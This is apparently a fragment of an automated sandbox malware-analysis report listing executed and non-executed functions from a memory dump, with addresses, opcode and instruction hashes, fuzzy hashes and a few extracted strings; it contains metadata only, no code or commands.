                                              • Instruction ID: 6b89baf66ba697021db0c07e6b004916717ac0db3155b79b3a552b1ce0bfc93d
                                              • Opcode Fuzzy Hash: 59db2b9e0c545bc3a3a8acf34c58789820a7906f86d3a9d4fc6acdbc47672f00
                                              • Instruction Fuzzy Hash: C551F45170DAC90FE386AB7898696A57FD2DF8A220B0941FFE08EC71A3DD5C8C46C341
                                              Function 00007FFAACCD0558 Relevance: .1, Instructions: 138COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f50832a1d032e16171fde88a4ace3985e44bd16f4caf70b0eda0c9158ce360d3
                                              • Instruction ID: ed6748a12957a58d4cf3bc958db2b0dc1a33df791e6e7b908ad51db934a87325
                                              • Opcode Fuzzy Hash: f50832a1d032e16171fde88a4ace3985e44bd16f4caf70b0eda0c9158ce360d3
                                              • Instruction Fuzzy Hash: 9A31C661B1C9484FE788EB3CD45A7B9A6C2EF99351F0545BEE04EC3293DE689C428381
                                              Function 00007FFAACCD0AD1 Relevance: .1, Instructions: 130COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24093fce7c137228c88faf522496b3dc61b6f2500b098cd7530f53aa3836fc8c
                                              • Instruction ID: 2f97ced404b4b1988133b588c5e1c58a9442ea10c37152460806ba0e277c2f03
                                              • Opcode Fuzzy Hash: 24093fce7c137228c88faf522496b3dc61b6f2500b098cd7530f53aa3836fc8c
                                              • Instruction Fuzzy Hash: 1131B3A1B1DA495FF745ABBC885A7BD77D1EF99311F0442BBE00DC3293DE2898018381
                                              Function 00007FFAACCD0855 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c4e4162a743798f036af246b084a6320c5f744d9f2635f50a04e58a630ebd93
                                              • Instruction ID: 68833ca2aeb67f2239d61da8421dae254aa0025da5fef6780f4d7d8fff07713c
                                              • Opcode Fuzzy Hash: 6c4e4162a743798f036af246b084a6320c5f744d9f2635f50a04e58a630ebd93
                                              • Instruction Fuzzy Hash: 75312C60A28A8D9FD381FB6CD4656A9FBF1FF89204B8480E5D44DC7397DF249800C782

                                              Non-executed Functions

                                              Function 00007FFAACCD06FA Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: <M_^$=M_^$M_^j$M_^p
                                              • API String ID: 0-3547729567
                                              • Opcode ID: bc3a0d67954b62a1e95b6e38499f3de97992ad7b55eec95dc84f3597be96783f
                                              • Instruction ID: 22ff8ca386045c7ac3e8093bb198edbf9db1cf0afd46bc140ae72bc8e86f1126
                                              • Opcode Fuzzy Hash: bc3a0d67954b62a1e95b6e38499f3de97992ad7b55eec95dc84f3597be96783f
                                              • Instruction Fuzzy Hash: C331F7E7A49556D9F20337BCA4466F83BC09F51364B4A86B7C0ACCE1C3DE58A04E45D6